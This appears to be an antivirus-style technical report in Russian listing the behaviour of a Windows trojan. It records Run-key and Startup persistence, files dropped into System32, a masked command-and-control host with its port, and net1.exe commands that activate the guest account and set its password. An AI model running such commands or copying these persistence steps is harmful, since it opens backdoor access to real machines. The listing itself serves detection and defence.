Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] '360tv' = '%WINDIR%\360tv.exe'
- %ALLUSERSPROFILE%\Start Menu\Programs\Startup\SVCHOST.SCR
- <SYSTEM32>\A53879F.exe
- <SYSTEM32>\cmd.exe /c <SYSTEM32>\DS.bat
- <SYSTEM32>\net1.exe user guest axiao154
- <SYSTEM32>\net1.exe localgroup %USERNAME%s axiao154 /add
- <SYSTEM32>\net1.exe user guest /active:yes
- <SYSTEM32>\rundll32.exe url.dll,FileProtocolHandler "<SYSTEM32>\8C3EC2F.BAT"
- <SYSTEM32>\cmd.exe /c ""<SYSTEM32>\8C3EC2F.BAT" "
- <SYSTEM32>\rundll32.exe url.dll,FileProtocolHandler "<SYSTEM32>\A53879F.exe"
- %WINDIR%\Temp\2011.exe
- <SYSTEM32>\DS.bat
- %WINDIR%\360tv.exe
- <SYSTEM32>\8C3EC2F.BAT
- <SYSTEM32>\A53879F.exe
- 'ax####54.3322.org':16366
- DNS ASK ax####54.3322.org
- ClassName: 'Indicator' WindowName: ''